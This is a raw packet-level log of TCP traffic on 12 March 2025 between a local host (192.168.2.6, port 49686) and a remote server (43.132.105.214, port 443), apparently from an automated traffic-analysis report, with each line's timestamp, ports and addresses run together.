                                                                        Mar 12, 2025 10:22:31.913994074 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.914000988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.914128065 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.932003021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.932023048 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.932506084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.932513952 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.936388016 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.942470074 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.942491055 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.942591906 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.942591906 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.942600012 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.942720890 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.947417021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.947432995 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.947613955 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.947619915 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.947949886 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.964935064 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.964958906 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.965050936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.965050936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.965065002 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.968324900 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.969443083 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.969465017 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.969551086 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.969551086 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.969559908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.969625950 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.977039099 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.977056980 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.977155924 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.977164984 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.977178097 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.980376005 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.985250950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.985280991 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.985372066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.985372066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.985382080 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.985491991 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.004889965 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.004975080 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.005012035 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.005037069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.005068064 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.008074999 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.020472050 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.020499945 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.020597935 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.020597935 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.020610094 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.020697117 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.031109095 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.031147957 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.031248093 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.031248093 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.031258106 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.032428026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.035813093 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.035830975 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.035912991 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.035923958 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.035949945 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.036039114 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.053621054 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.053637981 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.056054115 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.056061983 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.058032036 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.058051109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.059987068 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.059999943 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.065608025 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.065622091 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.065649986 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.065674067 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.065705061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.065705061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.067373037 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.073657990 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.073681116 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.073770046 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.073797941 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.076397896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.091070890 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.091149092 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.091186047 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.091211081 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.091236115 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.095922947 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.109080076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.109097004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.109209061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.109234095 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.109361887 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.119688988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.119705915 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.119849920 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.119858027 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.120033026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.124440908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.124458075 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.125391960 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.125402927 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.125555992 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.142023087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.142050028 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.143960953 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.143968105 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.146537066 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.146560907 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.146647930 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.146647930 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.146656036 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.152124882 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.154388905 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.154411077 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.155920029 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.155925989 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.160548925 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.162806034 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.162827015 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.162916899 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.162918091 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.162924051 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.164535999 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.179672956 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.179729939 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.179765940 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.179774046 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.179821014 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.179821014 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.197952986 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.197973013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.199520111 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.199527025 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.199840069 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.209139109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.209156036 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.209213972 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.209220886 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.209264994 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.209264994 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.213438034 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.213454008 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.213579893 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.213586092 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.215892076 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.230792999 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.230814934 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.231071949 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.231080055 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.231951952 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.235476017 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.235495090 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.235598087 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.235598087 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.235605955 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.235910892 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.243019104 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.243041992 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.243933916 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.243941069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.251379967 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.251399040 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.251411915 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.251418114 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.251442909 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.252887964 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.268265963 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.268342972 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.268383980 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.268392086 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.268419027 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.272532940 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.286247015 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.286287069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.286360979 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.286374092 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.286402941 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.292009115 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.298346043 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.298362970 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.300277948 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.300287962 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.300342083 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.301491022 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.301506042 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.301563978 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.301569939 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.301609039 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.319098949 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.319113016 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.319163084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.319169044 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.319214106 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.323781013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.323796988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.323868036 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.323874950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.323918104 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.331480980 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.331497908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.331576109 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.331583023 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.331624031 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.339792013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.339808941 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.339896917 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.339904070 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.339946032 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.356842995 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.356901884 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.356911898 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.356919050 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.356954098 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.374830008 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.374845982 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.374918938 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.374926090 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.374970913 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.386982918 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.387001991 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.387046099 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.387052059 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.387113094 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.387113094 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.390372992 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.390388966 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.390429974 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.390443087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.390464067 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.390487909 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.407608032 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.407627106 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.407690048 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.407699108 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.407731056 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.407747030 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.412187099 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.412209034 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.412261009 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.412266016 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.412302971 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.412319899 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.420003891 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.420018911 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.420097113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.420109987 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.420165062 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.428354979 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.428370953 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.428432941 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.428459883 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.428497076 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.445326090 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.445379019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.445395947 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.445420980 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.445439100 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.445458889 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.463442087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.463458061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.463517904 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.463541985 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.463582993 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.475663900 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.475678921 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.475759983 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.475781918 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.475826025 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.479001045 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.479016066 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.479074001 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.479083061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.479120970 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.496334076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.496351004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.496438026 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.496462107 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.496505022 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.500983953 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.501007080 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.501060963 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.501086950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.501127005 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.508532047 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.508548021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.508613110 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.508636951 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.508673906 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.517041922 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.517057896 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.517121077 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.517144918 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.517182112 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.533942938 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.533999920 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.534167051 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.534193039 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.534238100 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759124041 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759147882 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759196043 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759213924 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759231091 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759263039 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759279013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759294987 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759337902 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759344101 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759378910 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759396076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759412050 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759447098 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759453058 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759501934 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759686947 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759702921 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759747982 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.759757042 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.759803057 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.760961056 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.760976076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.761025906 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.761039019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.761085033 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.761208057 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.761224031 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.761266947 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.761280060 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:32.761298895 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:32.761318922 CET49686443192.168.2.643.132.105.214
